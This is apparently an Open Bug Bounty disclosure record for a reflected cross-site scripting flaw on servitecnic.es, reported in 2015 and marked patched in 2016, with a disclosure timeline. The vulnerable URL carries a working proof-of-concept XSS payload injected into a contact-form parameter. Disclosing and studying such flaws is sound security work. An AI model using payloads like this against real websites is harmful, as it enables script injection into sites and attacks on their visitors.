servitecnic.es XSS vulnerability

2015-09-14T14:25:00
ID OBB:86110
Type openbugbounty
Reporter Guitch404
Modified 2016-01-30T22:41:00

Description

Vulnerable URL:
http://www.servitecnic.es/anuncios-gratis/content/contact.php?subject=xss" autofocus onfocus=alert(/XSSPOSED/);//
Details:

Description| Value
---|---
Patched:| Yes, at 30.01.2016
Latest check for patch:| 30.01.2016 22:41 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 1628365
Google Pagerank| 1
VIP website status:| No
Check servitecnic.es SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 14 September, 2015 14:25 GMT
Vulnerability existence verified and confirmed| 14 September, 2015 14:28 GMT
Vulnerability patched by the website owner| 30 January, 2016 22:41 GMT